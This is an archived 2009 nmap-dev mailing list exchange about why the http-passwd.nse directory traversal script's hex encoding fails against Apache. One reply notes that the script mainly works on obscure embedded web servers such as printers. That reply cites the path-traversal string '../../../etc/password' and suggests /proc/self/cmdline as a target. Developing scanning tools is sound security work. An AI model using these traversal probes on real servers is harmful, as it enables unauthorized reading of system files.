[prev in list] [next in list] [prev in thread] [next in thread]
List: nmap-dev
Subject: Re: hexify() problem in http-passwd.nse
From: Joao Correa <joao () livewire ! com ! br>
Date: 2009-05-31 20:49:17
Message-ID: 10a7d2ed0905311349p6e907eb9vc3476cf446b3e864 () mail ! gmail ! com
[Download RAW message or body]
Thanks a lot Brandon!
Your 30 seconds answer was loud and clear!
On Sun, May 31, 2009 at 5:11 PM, Brandon Enright <bmenrigh@ucsd.edu> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Sun, 31 May 2009 16:47:31 -0300 or thereabouts Joao Correa
> <joao@livewire.com.br> wrote:
>
>> Kris, thanks for you answer and for the reference.
>>
>> My doubt is if, with the http-passwd.nse script, you are trying to
>> retrieve the passwd file directly, or if it is used to retrieve the
>> file as a parameter for the web application, just like descripted in
>> [1].
>>
>> Considering the source code I can only think about the first option,
>> but in this case we fall on the problem descripted on my first e-mail
>> (I“ve tried to reproduce the scenario here, but the hexed chars were
>> not decoded by the Apache, leading to failure). As mentioned before,
>> when I have removed the hexify function and sent the dir function
>> without special encoding, it worked fine. I don“t think it is the
>> expected behavior.
>>
>> Since the script dates from 2007 and the mentioned RFC dates from
>> 2005, I don“t believe that it is a problem of lost compatibility due
>> to Apache getting fit to the RFC.
>>
>> Have you used the script recently? Which web servers have you tried
>> to exploit?
>>
>> Thanks a lot,
>> Joćo Correa
>>
>
> Hey Joćo, sorry that I only have about 30 seconds to reply. The
> directory transversal script really isn't targeted at mainstream
> webserver like Apache and IIS. In some really heinous cases I suspect
> it would work against either, but it works pretty well against all of
> the hundreds of obscure webservers out there.
>
> For example, the ../../../etc/password works against the embedded HTTP
> server on many HTTP printers. Nevermind that it might violate RFC and
> best practices, it works on lots of servers.
>
> We might think of expanding the script beyond just /etc/password
> though. I've seen a number attacks recently that check for directory
> transversal by going after /proc/self/cmdline which seems to be more
> reliable than things like /etc/password
>
> Brandon
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v2.0.11 (GNU/Linux)
>
> iEYEARECAAYFAkoi5JMACgkQqaGPzAsl94ISUwCgvPQ4v+KcjozOTJsOFbF+O/Wx
> 6b4An3bwsbIZ8VpdbWOvnGl266fteeKY
> =OUnF
> -----END PGP SIGNATURE-----
>
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://SecLists.Org
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic